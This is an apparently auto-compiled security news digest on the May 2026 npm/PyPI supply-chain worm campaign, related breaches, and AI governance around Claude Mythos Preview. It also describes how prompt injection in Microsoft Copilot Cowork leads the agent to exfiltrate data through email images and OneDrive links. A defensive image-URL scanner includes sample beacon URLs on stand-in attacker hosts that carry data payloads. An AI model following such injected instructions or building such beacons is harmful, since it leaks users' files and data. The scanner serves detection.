The Information Machine

AI as Attack Tool and Attack Target: May 2026 Cybersecurity Moment

Version 10

2026-05-26 18:23 UTC · 248 items

What

The Mini Shai-Hulud supply chain campaign — launched May 11, 2026 by threat actor TeamPCP — has compromised 170+ npm and PyPI packages, breached approximately 3,800–4,000 GitHub internal repositories [4][6], exposed 30 EU institutions via the Trivy container-security scanner [11], and potentially extends to axios, one of the most downloaded JavaScript libraries in history [20]. On May 26, Simon Willison documented a concrete data exfiltration vulnerability in shipping Microsoft Copilot Cowork: prompt injection via malicious emails can leak OneDrive pre-authenticated download links, enabling file access without user approval [29]. MCP servers have simultaneously emerged as a recognized AI attack surface, with Microsoft, Datadog, and Palo Alto Networks all publishing on indirect prompt injection risks [30][31][32]. The AI governance thread centers on Claude Mythos Preview — the first AI system to autonomously complete AISI offensive cyber ranges — remaining withheld from deployment while NIST's CAISI serves as the US pre-deployment compliance gate [23][27].

Why it matters

Two threats are converging: AI systems exploited as attack vectors (supply chain weaponization via coding agents, MCP injection) and AI systems exploited as attack targets (Copilot Cowork data exfiltration, tool poisoning). The Copilot Cowork finding demonstrates that preventing data exfiltration is structurally unsolved in shipping agentic products, while the potential axios compromise illustrates how a single credential theft can cascade into transitive risk across hundreds of millions of projects — and the AntV wave's Sigstore badge-faking technique means standard provenance attestation cannot detect it.

Open questions

  • Is the axios npm compromise documented by Huntress [20] confirmed as part of the Mini Shai-Hulud campaign, and if so, how does it change exposure estimates beyond Mandiant's 1,000+ SaaS environments figure?

  • Has Microsoft issued a CVE or patch for the Copilot Cowork prompt injection data exfiltration vulnerability documented by Simon Willison [29], and does the same architecture flaw affect other Copilot products?

  • What does SOCRadar's formal dark web profile of TeamPCP [21] reveal about the group's identity and infrastructure — and does it connect TeamPCP to the Lapsus$ extortion activity reported by CSO Online [33]?

  • Does CAISI's voluntary framework evaluate models that labs withhold from public deployment, or only released models — leaving frontier capabilities like Claude Mythos outside public oversight? [26][27]

Narrative

The Mini Shai-Hulud supply chain campaign, launched by threat actor TeamPCP on May 11, 2026, began as a self-spreading worm targeting npm and PyPI packages, ultimately compromising more than 170 packages — including TanStack, LiteLLM, Guardrails AI, and Telnyx — and exfiltrating code-signing certificates from two OpenAI employee devices, triggering a mandatory app certificate rotation deadline of June 12, 2026 [1][2][3]. GitHub confirmed the theft of approximately 3,800–4,000 internal repositories via a poisoned VS Code extension (Nx Console version 18.95.0), with Forbes reporting a $50,000 ransom demand [4][5][6]. CVE-2026-33634 (CVSS 9.4) was formally assigned and added to CISA's Known Exploited Vulnerabilities catalog [7][8], Broadcom confirmed downstream exposure in Tanzu Application Platform and Spring Enterprise through the Trivy container-security scanner [9], and Mandiant quantified total campaign impact at more than 1,000 compromised SaaS environments [10]. CERT-EU officially confirmed that the European Commission's cloud infrastructure was breached via the same Trivy vector, exposing data across 30 EU institutions [11][12].

The campaign's second wave — characterized by the Cloud Security Alliance as 'Shai-Hulud/Megalodon' — involved 600+ malicious npm packages in the AntV data visualization ecosystem that used a novel technique to fake Sigstore security verification badges, undermining a primary supply chain trust signal without triggering standard provenance checks [13][14]. Socket.dev traced the campaign's initial access to a phishing attack against npm package author 'Qix,' whose compromised credentials seeded the broader worm [15]. Snyk's identification of a Bun-based stealer and Socket.dev's SAP CAP analysis documented specific malware components in the enterprise segment [16][17], while RedRays and Mend.io framed the SAP attack as deliberately designed to weaponize AI coding agents by injecting malicious packages into dependency trees those tools automatically install [18][19]. The most consequential potential expansion is Huntress's documentation of an axios npm compromise [20] — axios is a transitive dependency for hundreds of millions of JavaScript projects, meaning confirmed inclusion in the campaign would dwarf all previously quantified exposure figures. SOCRadar has published a formal dark web profile of TeamPCP [21], and WIRED characterized GitHub as 'just the latest victim' of a serial campaign [22], signaling the incident has crossed into mainstream security awareness.

The AI governance dimension centers on AISI's official evaluation of Claude Mythos Preview, which autonomously completed both UK offensive cyber ranges — including a 32-step scenario — making it the first AI system to do so [23][24]. The Turing Institute's CETAS has assessed the structural implications of this capability threshold [25], and AuthMind argues that Anthropic's decision to withhold Mythos from public deployment is a significant policy signal: if labs retain their most capable models in reserve, voluntary frameworks like NIST's CAISI may evaluate a curated rather than frontier subset of AI capability, leaving the most dangerous systems outside public audit [26][27]. The Foundation for American Innovation has defended CAISI as a pragmatic first step toward structured federal oversight [28], while Zvi Mowshowitz has characterized governance anchored in cybersecurity as politically captured.

On May 26, 2026, Simon Willison documented a concrete data exfiltration vulnerability in shipping Microsoft Copilot Cowork: agents can send emails to users' inboxes without approval, and because those emails can contain external images triggering network requests, attackers can exfiltrate data when a user opens a compromised message [29]. OneDrive's pre-authenticated download links can also be leaked via successful prompt injection, allowing file access without further authentication [29]. Willison frames preventing data exfiltration as 'the biggest challenge in designing agentic systems' — a characterization aligned with the broader institutional discourse around MCP servers as an emerging attack surface, with Microsoft, Datadog, and Palo Alto Networks all publishing on indirect prompt injection risks in MCP environments [30][31][32]. These findings establish that AI systems face attack not only through their software dependencies but through the agentic capabilities they expose to adversarial external content.
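The exfiltration channel just described (an agent-written email whose remote image URL carries data chosen by an injected prompt) is one a mail gateway can check for before delivery. The following is an added defensive example and not code from Willison's post, Microsoft, or any source cited here; the trusted host, thresholds, and sample bodies are constructed assumptions.

```python
"""Flag remote-image references in agent-authored HTML email bodies.

Added defensive example (not from any source on this page). A message that
loads a remote image on open makes a network request the sender controls, so
an injected prompt can have the agent write data into that image URL. This
scanner inspects an outbound HTML body and reports every external image it
would fetch, noting URLs whose query string looks like a data carrier.
Host names, thresholds and sample bodies are constructed for illustration.
"""
import math
from dataclasses import dataclass
from html.parser import HTMLParser
from urllib.parse import parse_qsl, urlsplit

TRUSTED_IMAGE_HOSTS = {"cdn.example-corp.test"}  # constructed: own CDN
MAX_QUERY_LEN = 64       # a plain image rarely needs a longer query string
ENTROPY_THRESHOLD = 4.0  # bits/char; encoded data typically sits above this


@dataclass
class Finding:
    url: str
    reason: str


def _shannon_entropy(s: str) -> float:
    counts: dict[str, int] = {}
    for ch in s:
        counts[ch] = counts.get(ch, 0) + 1
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in counts.values()) if n else 0.0


class _ImgCollector(HTMLParser):
    """Collects <img src> values and url(...) inside inline style attributes."""
    def __init__(self) -> None:
        super().__init__()
        self.urls: list[str] = []

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "img" and a.get("src"):
            self.urls.append(a["src"])
        style = a.get("style") or ""   # background-image is fetched on render too
        if "url(" in style:
            start = style.index("url(") + 4
            end = style.find(")", start)
            if end > start:
                self.urls.append(style[start:end].strip("'\" "))


def scan_email_html(body: str) -> list[Finding]:
    """Return one Finding per remote image the body would load when opened."""
    collector = _ImgCollector()
    collector.feed(body)
    findings = []
    for url in collector.urls:
        parts = urlsplit(url)
        if parts.scheme not in ("http", "https"):
            continue  # data: and cid: images cause no network request
        if parts.hostname in TRUSTED_IMAGE_HOSTS:
            continue
        reason = "external image host"
        if len(parts.query) > MAX_QUERY_LEN:
            reason = f"query string of {len(parts.query)} chars in image URL"
        elif any(_shannon_entropy(v) > ENTROPY_THRESHOLD for _, v in parse_qsl(parts.query)):
            reason = "high-entropy parameter in image URL"
        findings.append(Finding(url, reason))
    return findings


def should_quarantine(body: str) -> bool:
    """Policy hook: hold any agent-authored mail that loads an external image."""
    return bool(scan_email_html(body))


# Constructed sample bodies: a benign mail, a beacon with an 80-char payload,
# and a short but high-entropy token smuggled in a tracking pixel.
SAMPLE_BENIGN = '<p>Report attached.</p><img src="https://cdn.example-corp.test/logo.png">'
SAMPLE_PAYLOAD = '<p>Hi</p><img src="https://collector.attacker.test/p.gif?d=' + "A" * 80 + '" width="1" height="1">'
SAMPLE_ENTROPY = '<div style="background-image: url(\'https://img.attacker.test/t.png?k=aB3xK9qZ2mN7pL4wR8\')"></div>'
```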

Timeline

  • 2026-05-05: NIST's CAISI formalized as US pre-deployment AI compliance gate through expanded safety-testing agreements with Google, Microsoft, and xAI [27]
  • 2026-05-11: TeamPCP launches Mini Shai-Hulud worm; 160+ npm and PyPI packages compromised including TanStack; two OpenAI employee devices hit, code-signing certificates exfiltrated [1][2][3]
  • 2026-05-11: Security researchers confirm tool poisoning attacks work silently against Claude, ChatGPT, Cursor, and other major AI assistants [45]
  • 2026-05-13: OpenAI publishes incident response and mandates app certificate rotation by June 12; AISI characterizes Claude Mythos Preview's autonomous clearance of UK offensive cyber ranges as a genuine AI capability threshold [1][44][24]
  • 2026-05-18: Reports emerge that TeamPCP targeted Mistral AI and is selling access to its internal source code repositories [46][47][48]
  • 2026-05-19: LiteLLM, Telnyx, and Guardrails AI identified as compromised; CVE-2026-33634 formally assigned with CVSS 9.4 critical severity rating [49][7][50]
  • 2026-05-20: GitHub confirms TeamPCP breach of approximately 3,800–4,000 internal repositories via poisoned Nx Console VS Code extension; Forbes reports $50,000 ransom demand [4][35][5][6]
  • 2026-05-21: CVE-2026-33634 scope expanded to include Trivy container-security scanner; LiteLLM publishes official security update; Aqua Security publishes formal Trivy advisory [51][52][53]
  • 2026-05-22: Mini Shai-Hulud confirmed targeting SAP npm packages; CISA adds CVE-2026-33634 to Known Exploited Vulnerabilities catalog; Broadcom issues Tanzu and Spring Enterprise impact assessment [54][8][9]
  • 2026-05-23: AntV ecosystem attack confirmed with 600+ malicious packages faking Sigstore badges; CSA characterizes campaign as two-wave 'Shai-Hulud/Megalodon'; RedRays and Mend.io frame SAP attack as weaponizing AI coding agents [14][13][18][19]
  • 2026-05-24: CERT-EU confirms European Commission cloud breach via Trivy across 30 EU institutions; Mandiant quantifies total campaign at 1,000+ compromised SaaS environments; CSO Online reports Lapsus$ has joined the extortion wave [10][11][12][33]
  • 2026-05-25: Socket.dev identifies phishing attack on npm author 'Qix' as initial access vector; TanStack publishes official postmortem; Huntress documents axios npm compromise; AuthMind and Turing Institute CETAS publish Mythos governance analyses [15][55][20][25][26]
  • 2026-05-26: Simon Willison documents data exfiltration vulnerability in Microsoft Copilot Cowork via prompt injection; Microsoft, Datadog, and Palo Alto Networks publish on MCP servers as an AI attack surface; SOCRadar publishes formal dark web profile of TeamPCP [29][30][31][32][21]

Perspectives

GitHub

Confirmed theft of 3,800–4,000 internal repositories via poisoned VS Code extension while maintaining that customer data was unaffected and impact was limited to internal code

Evolution: WIRED's characterization of GitHub as 'just the latest victim' of a serial TeamPCP campaign directly contests GitHub's incident-specific containment framing; additional social media amplification reinforces the serial-campaign narrative

OpenAI

Framed the TanStack supply chain incident as an industry-wide threat with limited blast radius — no customer data or production systems compromised — while issuing a June 12, 2026 certificate rotation deadline as the actionable user requirement

Evolution: The potential axios compromise, CERT-EU's 30 EU institutions, and Mandiant's 1,000+ SaaS figure collectively challenge the 'limited blast radius' characterization for the campaign as a whole

Mandiant + CERT-EU

Quantified the campaign at 1,000+ compromised SaaS environments and officially confirmed the European Commission's cloud infrastructure was breached via Trivy, exposing data across 30 EU institutions — establishing that supply chain DevSecOps vulnerabilities translate directly into government IT compromise

Evolution: Consistent; these are the authoritative scale figures anchoring the campaign's confirmed impact

Simon Willison

Documents a concrete data exfiltration vulnerability in shipping Microsoft Copilot Cowork — prompt injection via malicious email can leak OneDrive pre-authenticated download links — and frames preventing data exfiltration as the central unsolved challenge in agentic AI design

Evolution: New voice this pass; the Copilot Cowork finding is the most direct evidence to date of an AI system being exploited as an attack target in a shipping product, adding a non-supply-chain dimension to the thread

AISI (UK AI Safety Institute)

Claude Mythos Preview represents a genuine capability threshold — the first AI system to autonomously complete both AISI offensive cyber ranges including a 32-step scenario — warranting serious institutional attention to what autonomous AI cyber capability means for security

Evolution: Consistent; the Turing Institute CETAS and AuthMind have added academic and policy weight to the governance implications of this threshold

AuthMind + Turing Institute CETAS

Anthropic's decision to withhold Mythos from public deployment is a significant policy signal — voluntary frameworks like CAISI may evaluate a curated rather than frontier subset of AI capability if labs retain their most capable models in reserve, leaving the most dangerous systems outside public audit

Evolution: Consistent; the Foundation for American Innovation's defense of CAISI as a pragmatic first step adds a countervoice, but does not address the 'withheld model' gap AuthMind identifies

Snyk + Socket.dev + RedRays (security research community)

Provide the most technically granular public analysis across multiple campaign fronts: Bun-based stealer malware in SAP CAP packages, Qix phishing as initial access vector, and AI coding agent dependency injection as the specific mechanism by which automated package installation becomes an attack surface

Evolution: Consistent; Snyk's dedicated TanStack analysis and Socket.dev's Qix phishing attribution remain the deepest public technical record of the campaign's mechanics

Mend.io + MCP/agentic AI attack surface concerns

The SAP segment of the campaign ran 'via Claude Code,' implicating Anthropic's specific AI coding assistant as a vector; the Copilot Cowork vulnerability and MCP security publications from Microsoft, Datadog, and Palo Alto Networks extend this concern from supply chain poisoning to any agentic system that can be fed adversarial content

Evolution: The Copilot Cowork finding and institutional MCP security publications have expanded the AI-as-attack-vector concern into a structural challenge across multiple shipping products — while Anthropic still has not responded to the Claude Code attribution

Tensions

  • GitHub's 'customer data unaffected, limited impact' framing sits in direct tension with WIRED's characterization of GitHub as 'just the latest victim' of a serial TeamPCP campaign — the serial framing implies systematic targeting rather than opportunistic compromise, which is inconsistent with GitHub's incident-specific containment narrative [4][35][5][22][6]
  • AISI's 'autonomous offensive threshold' characterization of Claude Mythos Preview is contested by independent cybersecurity commentators who question the evaluation methodology and system card consistency, creating a debate about whether the milestone is accurately characterized or inflated [23][24][41][42][25]
  • The AntV attack's fake Sigstore security verification badges mean that npm provenance attestation — a primary trust signal in standard supply chain guidance — cannot detect this campaign, creating a gap between the remediation advice being given and the attacker evasion capabilities demonstrated; neither Sigstore nor the npm registry has issued a public response [14][13][43]
  • OpenAI's 'limited blast radius' framing sits in tension with expanding downstream evidence: CERT-EU's 30 EU institutions, Mandiant's 1,000+ SaaS environments, Lapsus$'s reported entry into the extortion wave, and the potential axios compromise [1][11][10][33][20]
  • CAISI's voluntary pre-deployment framework, defended by the Foundation for American Innovation as a pragmatic first step, is challenged by AuthMind's argument that if labs withhold their most capable models, voluntary frameworks evaluate a curated rather than frontier subset of AI capability — and by Zvi Mowshowitz's critique that governance anchored in cybersecurity is politically captured and insufficiently general [27][28][26][44]
  • Mend.io's specific 'via Claude Code' attribution of the SAP attack to Anthropic's tool versus RedRays' generic 'AI coding agents' framing remains unresolved without an Anthropic response — and the Copilot Cowork vulnerability and MCP attack surface discourse now demonstrate the agentic AI attack vector extends structurally across multiple products, complicating any single-vendor attribution [19][18][29][30][31]

Sources

  [1] Our response to the TanStack npm supply chain attack — OpenAI Blog (2026-05-13)
  [2] Mini Shai-Hulud: TeamPCP compromises 160+ npm and PyPI packages in a supply chain attack that hit TanStack, Mistra... — reactive:ai-security-nexus (2026-05-19)
  [3] A Self-Spreading Supply Chain Attack Compromises TanStack npm ... — reactive:ai-security-nexus
  [4] Nx Console 18.95.0 Incident: How TeamPCP Breached GitHub — reactive:ai-security-nexus
  [5] GitHub Says 3,800 Repositories Breached—TeamPCP Hackers ... — reactive:ai-security-nexus
  [6] GitHub just confirmed that attackers stole about 3,800 internal repositories after a poisoned VS Code extension compromi… — Rohan Paul Twitter (2026-05-20)
  [7] GitHub - ugurrates/teampcp-supply-chain-attack: CVE-2026-33634 (CVSS 9.4) — The most impactful CI/CD supply chain attack of 2026 so far. · GitHub — reactive:ai-security-nexus
  [8] CISA Adds Trivy CVE-2026-33634 to KEV: Patch Supply Chain Risk ... — reactive:ai-security-nexus
  [9] Impact Assessment: Aqua Security Trivy Supply Chain Compromise (CVE-2026-33634) on Tanzu Application Platform and Spring Enterprise — reactive:ai-security-nexus
  [10] TeamPCP Supply Chain Campaign: Update 006 - CERT-EU Confirms European Commission Cloud Breach, Sportradar Details Emerge, and Mandiant Quantifies Campaign at 1,000+ SaaS Environments — reactive:ai-security-nexus
  [11] European Commission cloud breach: a supply-chain compromise — reactive:ai-security-nexus
  [12] European Commission breach exposed data of 30 EU entities ... — reactive:ai-security-nexus
  [13] Shai-Hulud/Megalodon: A Two-Wave AI Developer Supply Chain ... — reactive:ai-offensive-cybersecurity
  [14] Mini Shai-Hulud Returns: 600+ Malicious npm Packages Fake Sigstore Badges in AntV Ecosystem Attack — reactive:ai-security-nexus
  [15] npm Author Qix Compromised via Phishing Email in Major Suppl... — reactive:ai-security-nexus
  [16] Bun-Based Stealer Hits SAP CAP npm Packages | Snyk — reactive:ai-security-nexus
  [17] TeamPCP-Linked Supply Chain Attack Hits SAP CAP and Cloud MT... — reactive:ai-security-nexus
  [18] SAP npm Packages Hijacked to Steal Cloud Credentials and Weaponize AI Coding Agents — reactive:ai-security-nexus
  [19] Shai Hulud: SAP CAP Supply Chain Attack Via Claude Code — reactive:ai-security-nexus
  [20] axios npm Compromise: The Ultimate Supply Chain Scaries — reactive:openai-advanced-account-security
  [21] Dark Web Profile: TeamPCP — reactive:ai-security-nexus
  [22] GitHub is just the latest victim of TeamPCP, a gang that has ... — reactive:ai-security-nexus
  [23] Our evaluation of Claude Mythos Preview's cyber capabilities — reactive:frontier-ai-cyber-capabilities
  [24] How fast is autonomous AI cyber capability advancing? — reactive:ai-offensive-cyber (2026-05-13)
  [25] Claude Mythos: What Does Anthropic's New Model Mean for the ... — reactive:ai-security-nexus
  [26] When a Lab Withholds Its Best Model: What the Claude Mythos System Card Signals for Cybersecurity — reactive:ai-security-nexus
  [27] US government expands vetting of frontier AI models for security risks — reactive:ai-security-nexus
  [28] Kicking the Tires: A Voluntary Path to Pre-Deployment AI Vetting | The Foundation for American Innovation — reactive:ai-security-nexus
  [29] Microsoft Copilot Cowork Exfiltrates Files — Simon Willison (2026-05-26)
  [30] Protecting against indirect prompt injection attacks in MCP — reactive:anthropic-rapid-ascent
  [31] MCP servers have become a new attack surface in AI systems ... — reactive:ai-security-nexus
  [32] MCP Security Exposed: What You Need to Know Now — reactive:ai-security-nexus
  [33] Trivy supply chain breach compromises over 1,000 SaaS environments, Lapsus$ joins the extortion wave | CSO Online — reactive:ai-security-nexus
  [34] GitHub Breach via Malicious VS Code Extension: What You Need to ... — reactive:ai-security-nexus
  [35] Nx Console VS Code Extension Compromised - StepSecurity — reactive:ai-security-nexus
  [36] OpenAI caught NPM supply chain chaos after employee devices compromised — reactive:ai-security-nexus (2026-05-16)
  [37] OpenAI asks macOS users to update after TanStack npm ... — reactive:ai-security-nexus
  [38] TanStack npm Supply Chain Attack Prompts OpenAI Updates — reactive:ai-security-nexus
  [39] Claude Mythos Preview: Analysis of Anthropic's Public Announcement — LessWrong — reactive:ai-deployment-misalignment-risk
  [40] TanStack npm Packages Hit by Mini Shai-Hulud | Snyk — reactive:ai-offensive-cybersecurity
  [41] Anthropic's Mythos Claims Questioned by Cybersecurity Insider — reactive:frontier-ai-cyber-capabilities
  [42] Why Claude Mythos system card is a mess - Part 3, about ... - Reddit — reactive:ai-security-nexus
  [43] Mini Shai-Hulud npm Attack: AntV Ecosystem Compromise (May 2026) | Chainguard — reactive:ai-security-nexus
  [44] Cyber Lack of Security and AI Governance — Zvi's AI Roundups (2026-05-13)
  [45] 😺 Microsoft: your company is the AI bottleneck — The Neuron (2026-05-11)
  [46] TeamPCP sells Mistral AI repos after TanStack attack on OpenAI — reactive:ai-security-nexus (2026-05-18)
  [47] TeamPCP Claims Sale of Mistral AI Repositories Amid Mini Shai ... — reactive:ai-security-nexus
  [48] Hackers Put Mistral AI Source Code Up for Sale After Supply Chain Attack — reactive:ai-security-nexus
  [49] Mini Shai-Hulud Worm Compromises TanStack, Mistral AI, Guardrails AI & More Packages — reactive:ai-security-nexus
  [50] LiteLLM and Telnyx compromised on PyPI: Tracing the TeamPCP ... — reactive:ai-security-nexus
  [51] NVD - CVE-2026-33634 — reactive:ai-security-nexus
  [52] LiteLLM Supply Chain Attack: What Happened and How to Respond — reactive:ai-security-nexus
  [53] Trivy and LiteLLM Supply Chain Incident (CVE-2026-33634) Update — reactive:ai-security-nexus
  [54] Shai Halud: What is Shai-Hulud? Definition & Explanation of the Self-Replicating npm Worm | Kusari® — reactive:ai-security-nexus
  [55] Postmortem: TanStack npm supply-chain compromise — reactive:ai-security-nexus